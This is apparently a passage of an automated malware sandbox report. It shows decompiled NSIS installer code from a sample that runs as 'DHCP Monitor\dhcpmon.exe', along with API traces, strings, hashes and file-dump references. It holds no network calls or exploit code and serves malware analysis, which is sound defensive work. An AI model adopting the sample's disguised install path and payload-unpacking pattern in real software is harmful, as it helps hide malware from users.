					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x45
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                    0x00403a66
                                                                    0x00403a6f
                                                                    0x00403a76
                                                                    0x00403a78
                                                                    0x00403a8c
                                                                    0x00403a9e
                                                                    0x00403aa5
                                                                    0x00403aac
                                                                    0x00403ab2
                                                                    0x00403ab7
                                                                    0x00403abd
                                                                    0x00403ad0
                                                                    0x00403ad0
                                                                    0x00403adb
                                                                    0x00403a7a
                                                                    0x00403a85
                                                                    0x00403a85
                                                                    0x00403ae0
                                                                    0x00403aea
                                                                    0x00403af3
                                                                    0x00403af8
                                                                    0x00403b09
                                                                    0x00403b90
                                                                    0x00403b98
                                                                    0x00403ba1
                                                                    0x00403ba1
                                                                    0x00403bb7
                                                                    0x00403bbd
                                                                    0x00403bcb
                                                                    0x00403c4c
                                                                    0x00403c54
                                                                    0x00403c5e
                                                                    0x00403c63
                                                                    0x00403c69
                                                                    0x00403cf3
                                                                    0x00403cf8
                                                                    0x00403cfa
                                                                    0x00403d16
                                                                    0x00000000
                                                                    0x00403d16
                                                                    0x00403cfc
                                                                    0x00403d02
                                                                    0x00403d0a
                                                                    0x00403d0a
                                                                    0x00000000
                                                                    0x00403d02
                                                                    0x00403c77
                                                                    0x00403c82
                                                                    0x00403c87
                                                                    0x00403c89
                                                                    0x00403c90
                                                                    0x00403c90
                                                                    0x00403c9b
                                                                    0x00403ca3
                                                                    0x00403ca5
                                                                    0x00403ca7
                                                                    0x00403cb0
                                                                    0x00403cb3
                                                                    0x00403cb9
                                                                    0x00403cb9
                                                                    0x00403cbf
                                                                    0x00403cd8
                                                                    0x00403ce9
                                                                    0x00000000
                                                                    0x00403cee
                                                                    0x00403c56
                                                                    0x00403c58
                                                                    0x00000000
                                                                    0x00403bcd
                                                                    0x00403bcd
                                                                    0x00403bd9
                                                                    0x00403be3
                                                                    0x00403be9
                                                                    0x00403bee
                                                                    0x00403bfd
                                                                    0x00403d1b
                                                                    0x00403d1b
                                                                    0x00000000
                                                                    0x00403d1b
                                                                    0x00403c0c
                                                                    0x00403c47
                                                                    0x00000000
                                                                    0x00403c47
                                                                    0x00403b0f
                                                                    0x00403b0f
                                                                    0x00403b12
                                                                    0x00403b14
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403b1e
                                                                    0x00403b2e
                                                                    0x00403b33
                                                                    0x00403b3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403b3e
                                                                    0x00403b40
                                                                    0x00403b4d
                                                                    0x00403b4d
                                                                    0x00403b55
                                                                    0x00403b5b
                                                                    0x00403b83
                                                                    0x00403b8b
                                                                    0x00000000
                                                                    0x00403b6d
                                                                    0x00403b6e
                                                                    0x00403b77
                                                                    0x00403b7d
                                                                    0x00403b7e
                                                                    0x00000000
                                                                    0x00403b7e
                                                                    0x00403b79
                                                                    0x00403b7b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403b7b
                                                                    0x00403b5b

                                                                    APIs
                                                                      • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                      • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                    • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,00000000), ref: 00403ADB
                                                                    • lstrlenA.KERNEL32(Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,?,?,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76D7FA90), ref: 00403B50
                                                                    • lstrcmpiA.KERNEL32(?,.exe,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,?,?,Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                    • GetFileAttributesA.KERNEL32(Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.), ref: 00403B6E
                                                                    • LoadImageA.USER32 ref: 00403BB7
                                                                      • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                    • RegisterClassA.USER32 ref: 00403BF4
                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                    • CreateWindowExA.USER32 ref: 00403C41
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                    • GetClassInfoA.USER32 ref: 00403CA3
                                                                    • GetClassInfoA.USER32 ref: 00403CB0
                                                                    • RegisterClassA.USER32 ref: 00403CB9
                                                                    • DialogBoxParamA.USER32 ref: 00403CD8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                    • API String ID: 1975747703-1434591851
                                                                    • Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                    • Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
                                                                    • Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                    • Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 96%
                                                                    			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				intOrPtr* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe", 0x400);
				_t104 = E00405DE6("C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Program Files (x86)\\DHCP Monitor", "C:\\Program Files (x86)\\DHCP Monitor\\dhcpmon.exe");
				E0040624D(0x437000, E00405C2C("C:\\Program Files (x86)\\DHCP Monitor"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t110 = GlobalAlloc(0x40, _v20);
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}



























                                                                    0x00402eff
                                                                    0x00402f02
                                                                    0x00402f1c
                                                                    0x00402f21
                                                                    0x00402f34
                                                                    0x00402f39
                                                                    0x00402f3f
                                                                    0x00000000
                                                                    0x00402f41
                                                                    0x00402f52
                                                                    0x00402f63
                                                                    0x00402f6a
                                                                    0x00402f72
                                                                    0x00402f77
                                                                    0x00402f79
                                                                    0x00403067
                                                                    0x00403069
                                                                    0x00403075
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040307e
                                                                    0x004030aa
                                                                    0x004030b5
                                                                    0x004030be
                                                                    0x004030bf
                                                                    0x004030c4
                                                                    0x004030d5
                                                                    0x004030db
                                                                    0x004030e1
                                                                    0x004030e7
                                                                    0x004030f1
                                                                    0x0040310c
                                                                    0x00403115
                                                                    0x0040311a
                                                                    0x00403139
                                                                    0x00403149
                                                                    0x0040315b
                                                                    0x00403160
                                                                    0x00403168
                                                                    0x00403175
                                                                    0x0040317d
                                                                    0x00403182
                                                                    0x00403184
                                                                    0x00403184
                                                                    0x0040318a
                                                                    0x0040318a
                                                                    0x0040318d
                                                                    0x0040318f
                                                                    0x0040318f
                                                                    0x00403191
                                                                    0x00403193
                                                                    0x00403193
                                                                    0x0040319d
                                                                    0x004031a9
                                                                    0x00000000
                                                                    0x004031ae
                                                                    0x00000000
                                                                    0x00403168
                                                                    0x00000000
                                                                    0x0040311c
                                                                    0x00403086
                                                                    0x00403098
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402f7f
                                                                    0x00402f7f
                                                                    0x00402f84
                                                                    0x00402f88
                                                                    0x00402f8f
                                                                    0x00402f96
                                                                    0x00402f98
                                                                    0x00402f98
                                                                    0x00402fa7
                                                                    0x00403128
                                                                    0x0040316a
                                                                    0x00000000
                                                                    0x0040316a
                                                                    0x00402fb3
                                                                    0x00403037
                                                                    0x0040303a
                                                                    0x0040303f
                                                                    0x00000000
                                                                    0x00403037
                                                                    0x00402fc0
                                                                    0x00402fc5
                                                                    0x00402fcd
                                                                    0x00402ff3
                                                                    0x00403002
                                                                    0x00403008
                                                                    0x0040300d
                                                                    0x00403013
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040301d
                                                                    0x00403025
                                                                    0x00403028
                                                                    0x0040302d
                                                                    0x0040302f
                                                                    0x0040302f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040301d
                                                                    0x00403040
                                                                    0x00403046
                                                                    0x00403056
                                                                    0x00403056
                                                                    0x00403059
                                                                    0x0040305f
                                                                    0x0040305f
                                                                    0x00000000
                                                                    0x00402f7f

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00402F05
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,00000400), ref: 00402F21
                                                                      • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405DEA
                                                                      • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00402F6A
                                                                    • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AF
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00402F41
                                                                    • Null, xrefs: 00402FEA
                                                                    • Inst, xrefs: 00402FD8
                                                                    • C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
                                                                    • soft, xrefs: 00402FE1
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
                                                                    • "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00402EF1
                                                                    • C:\Program Files (x86)\DHCP Monitor, xrefs: 00402F4C, 00402F51, 00402F57
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                    • String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$C:\Program Files (x86)\DHCP Monitor$C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe$C:\Users\user~1\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                    • API String ID: 2803837635-4212463726
                                                                    • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                    • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                    • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                    • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                    0x004065ff
                                                                    0x00406608
                                                                    0x0040660a
                                                                    0x0040660a
                                                                    0x0040660e
                                                                    0x00406620
                                                                    0x0040661a
                                                                    0x0040661a
                                                                    0x0040661a
                                                                    0x00406624
                                                                    0x00406638
                                                                    0x0040664c
                                                                    0x00406653

                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                    • wsprintfA.USER32 ref: 00406638
                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-4240819195
                                                                    • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                    • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                    • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                    • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                    0x00405e19
                                                                    0x00405e1f
                                                                    0x00405e20
                                                                    0x00405e20
                                                                    0x00405e25
                                                                    0x00405e26
                                                                    0x00405e29
                                                                    0x00405e33
                                                                    0x00405e40
                                                                    0x00405e43
                                                                    0x00405e4b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e4f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e51
                                                                    0x00000000
                                                                    0x00405e51
                                                                    0x00000000

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405E29
                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405E18
                                                                    • "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00405E15
                                                                    • nsa, xrefs: 00405E20
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-2131144709
                                                                    • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                    • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                                    • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                    • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004032BF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(0x40b8a0) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x41abab
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}













                                                                    0x004032cf
                                                                    0x004032e2
                                                                    0x004032e7
                                                                    0x00403417
                                                                    0x00403419
                                                                    0x00000000
                                                                    0x0040341f
                                                                    0x004032f3
                                                                    0x00403306
                                                                    0x0040330c
                                                                    0x00403312
                                                                    0x0040331d
                                                                    0x00403322
                                                                    0x00403327
                                                                    0x0040332f
                                                                    0x00403331
                                                                    0x00403331
                                                                    0x0040333a
                                                                    0x00403341
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403347
                                                                    0x0040334d
                                                                    0x00403353
                                                                    0x00000000
                                                                    0x00403359
                                                                    0x0040335f
                                                                    0x0040337f
                                                                    0x00403384
                                                                    0x00403389
                                                                    0x0040338f
                                                                    0x00403395
                                                                    0x004033a6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033a8
                                                                    0x004033ae
                                                                    0x004033b0
                                                                    0x004033d3
                                                                    0x004033d9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033db
                                                                    0x004033dd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033df
                                                                    0x004033df
                                                                    0x004033f2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403401
                                                                    0x00000000
                                                                    0x00403401
                                                                    0x004033ba
                                                                    0x004033c1
                                                                    0x0040340e
                                                                    0x00403414
                                                                    0x00403414
                                                                    0x00000000
                                                                    0x00403414
                                                                    0x004033c3
                                                                    0x004033c9
                                                                    0x004033cf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403412
                                                                    0x00403412
